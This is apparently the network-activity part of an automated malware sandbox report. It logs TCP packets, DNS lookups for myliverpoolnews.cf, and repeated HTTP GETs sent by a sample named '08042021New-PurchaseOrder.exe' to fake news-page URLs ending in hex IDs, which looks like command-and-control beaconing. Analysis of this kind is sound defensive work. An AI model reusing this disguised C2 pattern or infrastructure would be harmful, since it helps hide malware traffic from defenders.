                                                                                    Apr 8, 2021 12:23:51.552387953 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:51.552419901 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:51.552431107 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:51.552572012 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:51.552592993 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:51.552608967 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:51.552627087 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:51.552638054 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:51.552674055 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:51.552753925 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:51.552813053 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:51.552831888 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:51.552870035 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:51.552875042 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:51.552958965 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:51.552973986 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:51.553073883 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:51.553107977 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:51.553112984 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:51.553123951 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:51.553193092 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:51.553240061 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:51.553272009 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:51.553289890 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:51.553329945 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:51.553353071 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:51.553400040 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:51.553402901 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:51.553411961 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:51.553472996 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:51.553515911 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:51.553560972 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:51.553627014 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:51.553663015 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:51.553750038 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:51.553786039 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:51.553865910 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:51.553898096 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:51.553926945 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:51.553939104 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:51.553993940 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:51.554069996 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:51.554110050 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:51.554122925 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:51.554234982 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:51.554297924 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:51.554315090 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:51.554331064 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:51.554354906 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:51.554364920 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:51.554486036 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:51.554529905 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:51.554533958 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:51.554627895 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:51.554656982 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:51.554675102 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:51.554691076 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:51.554707050 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:51.554716110 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:51.555375099 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:51.555396080 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:51.555463076 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:51.555969954 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:51.556022882 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:51.556088924 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:51.556109905 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:51.556127071 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:51.556160927 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:51.556358099 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:51.556376934 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:51.556411982 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:51.556488037 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:51.556539059 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:51.556545973 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:51.556596041 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:51.556612968 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:51.556638956 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:51.596270084 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:51.596288919 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:51.596311092 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:51.596345901 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:51.596357107 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:51.596410990 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:51.596431017 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:51.596443892 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:51.596463919 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:51.596466064 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:51.596489906 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:51.596548080 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:51.596601009 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:51.596607924 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:51.596617937 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:51.596662045 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:51.596669912 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:51.596683979 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:51.596741915 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:51.596762896 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:51.596786022 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:51.596790075 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:51.596801043 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:51.596828938 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:51.596836090 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:51.596856117 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:51.596872091 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:51.596887112 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:51.596942902 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:51.596992016 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:51.596997023 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:51.597001076 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:51.597008944 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:51.597024918 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:51.597044945 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:51.597062111 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:51.597078085 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:51.597120047 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:51.597130060 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:51.597140074 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:51.597147942 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:51.597187996 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:51.597192049 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:51.597210884 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:51.597245932 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:51.597295046 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:51.597320080 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:51.597368002 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:51.597414970 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:51.597444057 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:51.597472906 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:51.597490072 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:51.597502947 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:51.597517014 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:51.597526073 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:51.597533941 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:51.597568989 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:51.597584963 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:51.597601891 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:51.597603083 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:51.597619057 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:51.597620964 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:51.597687006 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:51.597759008 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.045954943 CEST4970380192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.074729919 CEST8049703172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.079735041 CEST8049703172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.080460072 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.108984947 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.131031036 CEST4970380192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.307437897 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.307463884 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.307480097 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.307495117 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.307511091 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.307527065 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.307553053 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.307569981 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.307590008 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.307605982 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.307626009 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.307641983 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.307650089 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.307655096 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.307737112 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.307765007 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.307784081 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.307806015 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.307820082 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.307828903 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.307841063 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.307926893 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.386554003 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.386579037 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.388286114 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.388329029 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.388355970 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.388375044 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.388392925 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.388410091 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.388427019 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.388458014 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.388478994 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.388503075 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.388520002 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.388531923 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.388547897 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.388564110 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.388581991 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.388602972 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.388618946 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.388636112 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.388653994 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.388669968 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.388691902 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.388710022 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.388735056 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.388753891 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.388766050 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.388813972 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.388832092 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.388848066 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.388865948 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.388884068 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.388902903 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.388930082 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.388947010 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.388963938 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.388983011 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.388995886 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.388999939 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.389014959 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.389019966 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.389027119 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.389030933 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.389033079 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.389034986 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.389036894 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.389039993 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.389043093 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.389045954 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.389048100 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.389051914 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.389054060 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.389056921 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.389059067 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.389060974 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.389064074 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.389076948 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.389079094 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.389094114 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.389094114 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.389110088 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.389111042 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.389130116 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.389146090 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.389147997 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.389168024 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.389182091 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.389194012 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.389214039 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.389223099 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.389236927 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.389256954 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.389261007 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.389273882 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.389286995 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.389311075 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.389316082 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.389331102 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.389348984 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.389350891 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.389372110 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.389401913 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.389411926 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.389421940 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.389432907 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.389448881 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.389467001 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.389482975 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:56.389487028 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:56.389508009 CEST44349704172.67.150.212192.168.2.3

                                                                                    UDP Packets


                                                                                    DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Apr 8, 2021 12:23:50.030350924 CEST | 192.168.2.3 | 8.8.8.8 | 0xa3c7 | Standard query (0) | myliverpoolnews.cf | A (IP address) | IN (0x0001)
Apr 8, 2021 12:23:50.210664988 CEST | 192.168.2.3 | 8.8.8.8 | 0x5299 | Standard query (0) | myliverpoolnews.cf | A (IP address) | IN (0x0001)

                                                                                    DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Apr 8, 2021 12:23:50.051722050 CEST | 8.8.8.8 | 192.168.2.3 | 0xa3c7 | No error (0) | myliverpoolnews.cf | | 172.67.150.212 | A (IP address) | IN (0x0001)
Apr 8, 2021 12:23:50.051722050 CEST | 8.8.8.8 | 192.168.2.3 | 0xa3c7 | No error (0) | myliverpoolnews.cf | | 104.21.56.119 | A (IP address) | IN (0x0001)
Apr 8, 2021 12:23:50.224140882 CEST | 8.8.8.8 | 192.168.2.3 | 0x5299 | No error (0) | myliverpoolnews.cf | | 172.67.150.212 | A (IP address) | IN (0x0001)
Apr 8, 2021 12:23:50.224140882 CEST | 8.8.8.8 | 192.168.2.3 | 0x5299 | No error (0) | myliverpoolnews.cf | | 104.21.56.119 | A (IP address) | IN (0x0001)

                                                                                    HTTP Request Dependency Graph

                                                                                    • myliverpoolnews.cf

                                                                                    HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49703 | 172.67.150.212 | 80 | C:\Users\user\Desktop\08042021New-PurchaseOrder.exe

Timestamp | kBytes transferred | Direction | Data
Apr 8, 2021 12:23:50.103962898 CEST | 940 | OUT |
GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-E349A863A698863617D7B55886FAE832.html HTTP/1.1
                                                                                    UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41
                                                                                    Host: myliverpoolnews.cf
                                                                                    Connection: Keep-Alive
Apr 8, 2021 12:23:50.195653915 CEST | 941 | IN |
HTTP/1.1 301 Moved Permanently
                                                                                    Date: Thu, 08 Apr 2021 10:23:50 GMT
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: max-age=3600
                                                                                    Expires: Thu, 08 Apr 2021 11:23:50 GMT
                                                                                    Location: https://myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-E349A863A698863617D7B55886FAE832.html
                                                                                    cf-request-id: 09529b876d0000cdbfa7195000000001
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=WCJBx8hERcJIAqHjl%2Bi8%2BixsL9oG4CObGFRIAoVqdbePV4nx8DfVuek8YYN8SziI5qEOSLCyX4JYtrDljLVgQqw%2FznHF1ds89Rzlfhu7nohq7aA%3D"}],"max_age":604800,"group":"cf-nel"}
                                                                                    NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 63cac852499dcdbf-CDG
                                                                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0
Apr 8, 2021 12:23:51.299626112 CEST | 2253 | OUT |
GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-ADD8B69CFB72A4D5DBAFC5A0A255FA77.html HTTP/1.1
                                                                                    UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41
                                                                                    Host: myliverpoolnews.cf
Apr 8, 2021 12:23:51.334906101 CEST | 2253 | IN |
HTTP/1.1 301 Moved Permanently
                                                                                    Date: Thu, 08 Apr 2021 10:23:51 GMT
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: max-age=3600
                                                                                    Expires: Thu, 08 Apr 2021 11:23:51 GMT
                                                                                    Location: https://myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-ADD8B69CFB72A4D5DBAFC5A0A255FA77.html
                                                                                    cf-request-id: 09529b8c150000cdbfcc8fa000000001
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=aLEY%2BEnS4BG4xv12NRCilWDALqZwCYuNniwo1v6CysW6ZLzxo7KbvzB4aBAkdzqzDjpRGzsqpqtIzqJal3d45%2F6qBY4R59n5RxOxfTPQ8Cp4TLY%3D"}],"max_age":604800,"group":"cf-nel"}
                                                                                    NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 63cac859bfe2cdbf-CDG
                                                                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0
Apr 8, 2021 12:23:56.045954943 CEST | 3572 | OUT |
GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-5183A347C7BAD04E3424599E1B978F29.html HTTP/1.1
                                                                                    UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41
                                                                                    Host: myliverpoolnews.cf
